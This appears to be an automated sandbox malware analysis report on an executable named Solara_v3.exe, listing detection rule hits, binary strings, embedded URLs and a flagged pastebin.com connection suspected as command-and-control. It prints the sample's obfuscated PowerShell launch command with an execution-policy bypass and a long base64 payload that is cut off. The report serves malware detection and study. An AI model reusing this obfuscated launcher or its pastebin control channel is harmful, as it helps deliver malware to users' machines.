HcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZ
    Sigma detected: Dynamic CSharp Compile Artefact
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7492, TargetFilename: C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZ

    Data Obfuscation

    barindex
    Sigma detected: Dot net compiler compiles file from suspicious location
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABP

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.0% probability
    Source: Solara_v3.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: n.pdbm!P source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb}!` source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\deno\deno\target\release\deps\deno.pdb source: Solara_v3.exe
    Source: Binary string: m.Core.pdb source: powershell.exe, 00000002.00000002.1735704425.00000141FBE48000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb}-H source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.pdb source: powershell.exe, 00000002.00000002.1714210124.00000141E544D000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.pdbhP source: powershell.exe, 00000002.00000002.1714210124.00000141E544D000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 4.0.0.0__b77a5c561934e089\System.Core.pdbF~$ source: powershell.exe, 00000002.00000002.1736252359.00000141FC0BE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\System.Core.pdb source: powershell.exe, 00000002.00000002.1735704425.00000141FBE48000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000002.00000002.1735869418.00000141FBE99000.00000004.00000020.00020000.00000000.sdmp

    Networking

    barindex
    Connects to a pastebin service (likely for C&C)
    Source: unknownDNS query: name: pastebin.com
    Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
    Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: pastebin.com
    Source: Solara_v3.exeString found in binary or memory: http://.css
    Source: Solara_v3.exeString found in binary or memory: http://.jpg
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://bjoern.hoehrmann.de/utf-8/decoder/dfa/
    Source: Solara_v3.exeString found in binary or memory: http://html4/loose.dtd
    Source: Solara_v3.exeString found in binary or memory: http://man7.org/linux/man-pages/man2/shutdown.2.html
    Source: Solara_v3.exeString found in binary or memory: http://my.json.host/data.json
    Source: powershell.exe, 00000002.00000002.1732463624.00000141F3F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E3D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: Solara_v3.exeString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E3D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
    Source: powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: Solara_v3.exeString found in binary or memory: https://crbug.com/v8/8520
    Source: Solara_v3.exeString found in binary or memory: https://crbug.com/v8/8520turbo_fast_api_callsenable
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=ED
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/manual
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/manual/linking_to_external_code/import_maps
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/manual/runtime/compiler_apis#denobundle).
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/std
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/std/
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/std/examples/cat.ts
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/std/examples/colors.ts
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/std/examples/colors.tsGenerate
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/std/examples/welcome.ts
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/std/fmt/colors.ts
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/std/fs/utils.ts
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/std/http/file_server.ts
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/std/testing/asserts.ts
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/x/
    Source: Solara_v3.exeString found in binary or memory: https://deno.land/x/example/types.d.ts
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://deno.land:80
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/)
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WorkerGlobalScope)
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Compile
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Global)
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Instanc
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/LinkErr
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Memory)
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Module)
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Runtime
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Table)
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/compile
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/instant
    Source: Solara_v3.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/validat
    Source: Solara_v3.exeString found in binary or memory: https://dl.deno.land/canary-latest.txt
    Source: Solara_v3.exeString found in binary or memory: https://dl.deno.land/canary/
    Source: Solara_v3.exeString found in binary or memory: https://dl.deno.land/canary/(b
    Source: Solara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp, Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://dl.deno.land/canary/(bN
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#concept-event-listener-invoke
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#concept-event-path-append
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#concept-shadow-including-inclusive-ancestor
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#event-path
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#get-the-parent
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#retarget
    Source: Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#body-mixin
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-construct-readablestream
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-filtered-response-basic
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-headers-append
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-headers-fill
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-network-error
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#cors-safelisted-response-header-name
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#dom-headers
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#forbidden-response-header-name
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata
    Source: Solara_v3.exeString found in binary or memory: https://github.com/Microsoft/TypeScript/issues/2577)
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: Solara_v3.exeString found in binary or memory: https://github.com/WICG/import-maps#the-import-mapSet
